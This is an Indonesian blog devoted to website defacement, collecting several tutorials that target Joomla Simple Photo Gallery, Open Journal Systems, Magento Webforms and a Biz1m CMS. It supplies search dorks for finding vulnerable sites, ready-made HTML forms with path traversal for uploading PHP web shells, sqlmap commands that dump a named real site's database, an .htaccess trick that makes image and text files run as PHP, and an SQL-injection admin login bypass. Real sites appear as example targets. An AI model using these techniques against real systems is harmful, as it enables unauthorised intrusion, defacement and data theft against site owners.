Defa Squad

Defa Squad

Tempat Belajar Deface

Post Top Ad

Thursday, July 13, 2017

Tutorial Deface : Deface Joomla Simple Photo Gallery Shell Upload

July 13, 2017 0
Go Gees o,O Tutorial nya o.O , gw harap lu langsung Paham o.O Gk Paham ?

Dork -> inurl:com_simplephotogallery
Exploit ->  /administrator/components/com_simplephotogallery/lib/uploadFile.php
Dorking dulu lah o.0 Pilih web Masukkan Exploit -> Jadi Target.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
Kalo Web Vuln akan bacaan seperti ini : 

 20.   $fieldName = 'uploadfile';
87.      $fileTemp = $_FILES[$fieldName]['tmp_name'];
94.         $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96.      if(! move_uploaded_file($fileTemp, $uploadPath))


Not Found ? Atau 404 ? Tinggalin deh -_-
Silahkan Copy Code ini :
<form method="POST" action="http://familyattackcyber.blogspot.com/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
    <input type="file" name="uploadfile"><br>
    <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
    <input type="submit" name="Submit" value="Enjoy Aje">
</form>

Paste abis itu save dengan .html ,jika sudah edit file tersebut lihat http://familyattackcyber.blogspot.com ganti dengan target kalian.
Jika sudah buka , abis itu pilih shell lu dan klik Enjoy Aje
Name Shell jadi Random contoh -> FAC__D31saxA.php
Shell Access -> http://target.com/FAC__(RandomString).php

sumber : https://familyattackcyber.blogspot.co.id/2017/01/deface-joomla-simple-photo-gallery_26.html
Read More

Tuesday, July 11, 2017

Tutorial Deface Di Android : Using Sqlmap Android with Termux

July 11, 2017 0
Halo dunia :'v, ketemu lagi nih sama mimin rahdev, kali ini w mau share cara make sqlmap di android dengan termux. Lanjutan tutor kemaren.

Bahan :
  1. Android Lolipop
  2. Termux ( ada di playstore )
  3. Sqlmap ( Cek Disini )
  4. Target vuln
Step :
  1. Buka termux
  2. Pindah ke directory sqlmap
  3. Ketik "python2 sqlmap.py -u http://www.xmvb.org/art.php?id=8 --dbs" 
  1. Akan muncul nama database seperti gambar
  2. Cara liat tablenya gimana ? Ketik "python2 sqlmap.py -u http://www.xmvb.org/art.php?id=8 -D xmvbsite --tables"


Akan muncul nama nama mantan yg pernah menyakitimu :'v
Cara liat column disalah satu table gimana ? Ketik "python2 sqlmap.py -u http://www.xmvb.org/art.php?id=8 -D xmvbsite -T zh_ad --columns" 




  1. Jeng jeng jeng :'v muncul semua nama column di table zh_ad
  2. Terus tinggal dump columnnya pake command "python2 sqlmap.py -u http://www.xmvb.org/art.php?id=8 -D xmvbsite -T zh_ad --dump".
sumber : http://firmansetyop.blogspot.co.id/2017/07/cara-menggunakan-sqlmap-di-android.html
Read More

Tool : cara install sqlmap di android

July 11, 2017 0
Halo guys, kali ini w mau share cara install sqlmap di android dengan termux. Kenapa dengan termux ? Karena lebih simple pake termux ketimbang terminal emulator dll.

Bahan :
  1.  Android 5.1+
  2.  Termux ( ada di playstore )
  3.  Internet
Langkah :
  1.  Install dan buka termux
  2.  Ketikkan "apt-get update"
  3.  Install python2.7 dengan command "apt-get install python2"
  4.  Install git dengan command "apt-get install git"
  5.  Clone sqlmap dari github dengan command "git clone https://github.com/sqlmapproject/sqlmap.git"
  6.  Tunggu sampai selesai
  7.  Pindah ke directory sqlmap "cd sqlmap"
  8.  Ketikan "python2 sqlmap.py"
  9.  Jika terinstall akan muncul tulisan sqlmap
  10.  Sqlmap sukses terinstall ^_^

Cara make sqlmap gimana ? Liat next post ea :v


Read More

Sunday, July 9, 2017

Tutorial Deface : Cara Deface OJS (Open Journal System) Terbaru

July 09, 2017 0
Hello guys ! :) , Okee artikel kali ini saya akan share Cara Deface Website OJS (Open Joursnal System)
Tutorial di kasih secara lengkap kok !

Apa itu OJS ? OJS Adalah sebuah aplikasi Journal Terbuka untuk Management yang biasa di gunakan dalam pemerintah , pendidikan & lembaga lain. Type : Uploader File Data

Vuln/Dork OJS  : /index.php/index/user/register (Bisa Registrasi)

  1. Kamu harus mendaftar dulu di sini > site.com/index.php/index/user/register
-Jangan lupa untuk mencentang Registrasi sebagai Author / Penulis & Jangan ceklis Email konfirmasi
2.Setelah Registrasi Klik "New Submission"
3.Selesaikan Step 1 
4.Di Step 2 , Kamu dapat upload shell (Format Shell : a.phtml)
5. Jika Sukses Maka Seperti ini : 
NB : File name : 4-4-1-SM.phtml 4= ID User kamu Shell Path : /files/joursnals/1/articles/[IDUSER]/Submission/original/[Namafile].phtml
Contoh : files/journals/1/articles/4/submission/original/4-4-1-SM.phtml
Jadi kalian ambil angka yang pertama , angka pertama = ID User kamu

Oke sekian terimakasih , jika masih bingung bisa kontak di akun fb.
Semoga bermanfaat ^^ . 

sumber : http://cybers1337.blogspot.co.id/2016/12/cara-deface-ojs-open-journal-system.html
Read More

Tips : menggunakan htaccess untuk bypass shell

July 09, 2017 0
Halo , dipostingan kali ini saya ingin berbagi tentang bagaimana teknik ampuh saat tidak bisa upload backdoor.
Saat kita sudah menemukan sebuah web yang bisa upload file ternyata web tersebut tidak bisa upload file backdoor yang berektensi kan .php, lalu bagaimana caranya kita upload file backdoor kita ? setelah di coba bypass ekstensi .php , phptml , php5 , php.jpg dan lain-lain ternyata gak bisa juga.

Cara nya sangat simple Upload file .htaccess yang bisa sulap :v file .txt , .png dan .fla di baca oleh web server menjadi file php

berikut kodenya
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
save dengan .htaccess dan filetype all  jangan nama filenya .htaccess.txt 
atau  download langsung filenya disini ( Touch my oppai pliss )

nah kalau sudah terupload , silahkan upload shell yang extnya .png . txt or .fla di dir yang sama dengan htaccess yang tadi                                                                       
jangan up shell yang ext .php.png .php.txt dan .php.fla cukup ext diatas aja um

Sumber : https://forum.surabayablackhat.org/d/154-teknik-ampuh-saat-tidak-bisa-upload-backdoor
Read More

Thursday, July 6, 2017

Tutorial Deface : Menggunakan Magento Webforms Shell Upload Vulnerabilty

July 06, 2017 0

Kali ini gua mau Repost Artikel gua Teknik Deface Menggunakan Magento Webforms File Upload Vulnerabilty


Google Dork :

- inurl:/webforms/index/index intext:2016
- inurl:/webforms/index/index/ intext:beauty intitle:shop dll

 (kembangkan)

atau kalian bisa pakai Dork Magento Add Admin

Dork Magento Lengkap

CSRF:

kalian bisa pakai CSRF Online di Sini



atau pakai CSRF sendiri

 <form method="POST" action="https://site.Target.com/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>

Kalau pake CSRF Online  ini POST File dengan : files[]

Exploit :

www.site.com/path//js/webforms/upload/index.php

Vulnerabilty : []

Contoh site vuln : 

https://shop.destrooper.com/js/webforms/upload/index.php

Step By Step : 

1. Masukan Target , dan PostFile. kalau sudah klik Kunci Target 


 2. Upload File kamu. Bisa di upload shell tapi kalau error coba ganti ext jadi .phtml
kalau masih error upload aja script deface mu
kalau sudah , klik Upload 





 3. Nanti akan muncul angka random
  
 4. Tetak Shell atau File kita

www.site.com/[path]/js/webforms/upload/files/[angka random]/file kita.txt etc

kalau masih binggung silahkan liat vidio di bawah

 


Sumber : https://cowokerensteam.blogspot.co.id/2017/01/deface-menggunakan-magento-webforms.html
Read More

Tutorial Deface : Bypass Admin CMS Biz1m.com

July 06, 2017 1
Hello World; Malaam Fans, Please Say Hello Haters ;*
begimana kabar lu pade ? ya gue tau , masih pade menjomblo kan :p wkwkkw xD
hahaha, dah Lamaaaaaa banget guaaa gak ngeBlog >,<" , sampe lupa ini cara ngetik artikel tutorial yang asik dan gak garing gimana (biasanya juga garing asuw).
ampee lupa juga cara login blog gimana awkkwakwakkwakwa.
gimana dikit lagi lebaran nih (bagi yang menjalankan), tapi sloww Kesalahan lu pada dah gue maafin kok wkwkwkkw.
Artikel Tutorial kali ini gue dikasih sama Keluarga Dumay gue yaitu bang pu.sh , tq bang pu.sh :*
kalo gak di titipin artikel, gue juga gak bakal buka blog lagi nih wkwkkw >..<"

langsung aja dah, gue baru sampe rumah. artikel kali ini adalah Tutorial Deface Website Bypass Admin CMS Biz1m.com.


Dork : intext:Jumlah ahli ahli vip jumlah lawatan
Admin page : /admin-cp/
Exploit : ‘ or 1=1 limit 1 -- -+

1. Search target menggunakan dork diatas atau kalian bisa mengembangkan dork tersebut untuk mendapatkan hasil yg fresh



2. Masuk ke web target, buka admin page nya di, http://target.com/admin-cp/



3. Masuka username : ‘ or 1=1 limit 1 -- -+ dan password : ‘ or 1=1 limit 1 -- -+



4. Jika sudah maka akan tampak admin dashboardnya



5. Jika sudah, sekarang waktunya upload shell, buka di http://target.com/admin-cp.php?buka=iklanvvip



6. Pilih edit, lalu sekarang kita upload shell dengan ext shell.php.jpg



7. Sebelum kita upload shell, buka Tamper Data,lalu start tamper data,klik submit,buka tampernya, kita edit nama file menjadi shell.php melalui tamper data.




Menjadii



8. Jika sudah, klik Ok, maka akan terupload shell / uploader kita, dan muncul link akses shell / uploader tersebut



9. Sekarang kita coba buka uploader yang sudah terupload, melalui link yang muncul di web target.



Dan liat, uploader nya sudah terupload, sekarang bebas kalian mau apa, disini saya hanya akan mengupload script di dir root nya.



Woot? Happy Deface !


NB : Jika ingin melakukan patching, diharapkan jangan gblk, jangan page login admin di deface, kita belajar bersama disini :) -pu.sh


dah ye, simpel kan ? intinye pinter2 lu Dorking dan eksekusi aja hehhe.
lanjutin deh, lu eXplore dewek nih eXploit & Bug (y) , moga membantu lu ye . ya minimal buat Refrensi aja awkkwaka xD

sumber = http://www.tkjcyberart.org/2017/06/bypass-admin-cms-biz1mcom.html
Read More

Post Top Ad